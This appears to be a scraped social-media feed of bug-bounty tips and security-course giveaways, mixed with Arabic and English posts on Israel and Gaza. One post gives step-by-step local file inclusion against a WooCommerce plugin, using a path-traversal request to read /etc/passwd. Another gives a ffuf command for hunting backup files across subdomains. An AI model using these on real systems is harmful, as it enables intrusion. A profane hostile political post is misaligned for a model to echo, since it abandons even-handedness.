ffuf -w subdomains.txt:SUB -w payloads/backup_files_only.txt:FILE -u https://SUB/FILE -mc 200 -rate 50 -fs 0 -c -x http://localip:8080 payload:github.com/coffinxp/payloads…

this tool helped me get my first bounties! it’s very useful for turning huge, messy scope into actual findings. i'm putting it out there for everyone now. #bugbounty #recon #infosec #automation

$1,000 GIVEAWAY 🎁‼️ Here’s how to enter: 1️⃣ Fill out the ITMOAH survey 2️⃣ Like this post 3️⃣ Comment your fave tool 4️⃣ Repost bc your friends deserve a chance too Giveaway closes Sept 30 at 11:59pm ET. One hacker takes home $1K. 20 others will score $200 each. Already filled out the survey? You’re entered to win! If not, now's your chance: surveymonkey.com/r/bugcrowd-…

الشهيد انس الشريف، صحفي الجزيرة، قتلته إسرائيل لأنها لا تريد من يزعجها خلال الإبادة

🚨 ENDLESS BUNDLE GIVEAWAY 🚨 You asked — we're doing another one! We're giving away lifetime access to the Endless Bundle: ⚡ All current future courses 🎓 CNWPP & CAPIE certs 📡 Live lessons & walkthroughs 🧠 Discord with weekly giveaways 👕 Cost-price exclusive merch access 💣 Access to upcoming 005 course … and way more. 🎁 To enter: 1️⃣ Like ❤️ 2️⃣ Retweet 🔁 3️⃣ Reply 💬 with why YOU want to win ⏳ Deadline: AUGUST 3RD! After that, the winner is locked and loaded. Don’t miss out! 💥 Grab it now at an unbeatable price (if you don’t want to risk missing out): 👉 thexssrat.podia.com/full-hou… 👀 This is a lifetime hacking pass. Get in now. #CyberSecurity #BugBounty #CTF #Hacking #EthicalHacking #XSS #InfoSec #Giveaway #XSSRat #CNWPP #CAPIE #CyberCrusade #EndlessBundle

FUCK ZIONISM and FUCK ISRAEL EVERY FUCKING DAY

لو حد هيبدء يذاكر android pentest ان شآء الله البوست ده يفيدك linkedin.com/posts/sisi0x_an… #android #androidpentest

(قل للمؤمنين يغضوا من أبصارهم ويحفظوا فروجهم ذلك أزكى لهم إن الله خبير بما يصنعون) النظر إلى المحرمات من أخطر الذنوب التي شاعت بين شبابنا وأطفالنا بسبب الإنترنت أداة HaramBlur تستخدم الذكاء الاصطناعي لحجب المحتوى المحرم في الصور والفيديو تلقائيا أثناء التصفح حملها وشاركها ⬇️

ولاد اللدين ,بغاو يلبقو ليهم تهمة المخدرات مع أنه السيدة النروجية كان عندها غير تبغ السنوس اللي معروف في النرويج و اللي كيتباع عندنا في المغرب قانونيا. هادشي غير باش ميدافعوش عليهم الصحافة و الرئي العام. دابا عاد عرفت منين جات جملة: فعايل ليهود.

إختطفت قوات الإحتلال الصهيونية قبل قليل الصحفي المغربي محمد البقالي بالإضافة إلى كل طاقم القارب حنظلة المتجه إلى غزة محملة بمساعدات إنسانية بما فيها حليب الرضع. نتمى السلامة لمحمد و كل زملائه و العودة في أقرب وقت لعائلاتهم

🎁 Valorant meets Pokémon TCG Giveaway 🎁 For the next 72 hours ONLY! Grails is giving away: - $10, $25, $50 Valorant Gift Cards - One PSA 9 Charizard 174/172 - 1,000 Free Grails credits for 10 lucky ones To enter: 1- Follow @grailsgg 2- Like & RT 3- Tag a friend below

🎁PHASEGUARD BUNDLE GIVEAWAY🎁 Ends on July 11th - Good luck everyone! You can participate through the Gleam contest Link down below ⬇️

🚨 Another Sponsor Giveaway! @TheSecOpsGroup Dropped Their Brand-New Certified Red Teamer - eXpert (CRTeamerX) Exam! In the last giveaway, you probably saw when they launched CRTeamer, which looked amazing. Now, with CRTeamerX, they’ve taken everything up a notch, for experienced red teamers! 🥷 This exam was developed to mimic hardcore simulation of what red teaming actually looks like in the field. From the description: ✔️ Using C2? Yep ✔️ Fully patched systems, hell Yeah!. ✔️ Payload building? Absolutely. ✔️ Evasion, lateral movement, post-ex? All of it. And it hurts in the best way. 😅 If you’re someone who thrives on challenge and doesn’t mind getting your hands dirty in a real-world setup, you’re going to love this one. 🔥 They’re giving away FREE access to the CRTeamerX exam to 3 lucky folks! Want in? It’s simple: ❤️ Like, 🔁 Repost and 👥 Tag your red team fam Also, they’ve got a 90% Discount with launch code: CRTEAMERX-90 (grab it while it lasts) 👉 pentestingexams.com/product/… A big shoutout and appreciation Sumit Siddharth and the crew, once again proving they get what the community wants!👍

🎉 Since it’s my birthday, I want to give back to the community! 🥳 I’ve got 5 one-month PentesterLab vouchers to reward the best write-ups/findings of 2025 so far. To enter: 1️⃣ Follow me 2️⃣ ❤️ Like & 🔁 RT this tweet 3️⃣ 💬 Comment with a link to your own—or someone else’s—top write-up or research Winners announced in 48–72 hours. Let’s celebrate your hacks! 🔐 #Hackerone #BugBounty #infosec #Bugcrowd

Yup here it, it's my own findings write up- medium.com/@dishantsingh989/…

1/ Spend at least 30 minutes on a new target 2/ Look for “No”s 3/ Use Italics Tags in your inputs instead of XSS payloads 4/ Focus on SaaS apps that are multi-tenant 5/ Buy Burp Pro

I've made a serious chunk of change over the years by reporting a bug that is rarely talked about: Paywall Bypasses. The concept is simple: Access a paid feature for free or less than you should have to pay for it. Here are some tricks to finding these bad boys:

WooCommerce plugin allows LFI! 🍃 02: Capture request in Burp 03: Change request method to POST and add: POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1 04: Also add: action=woof_text_search& 05: That’s it! You got local files.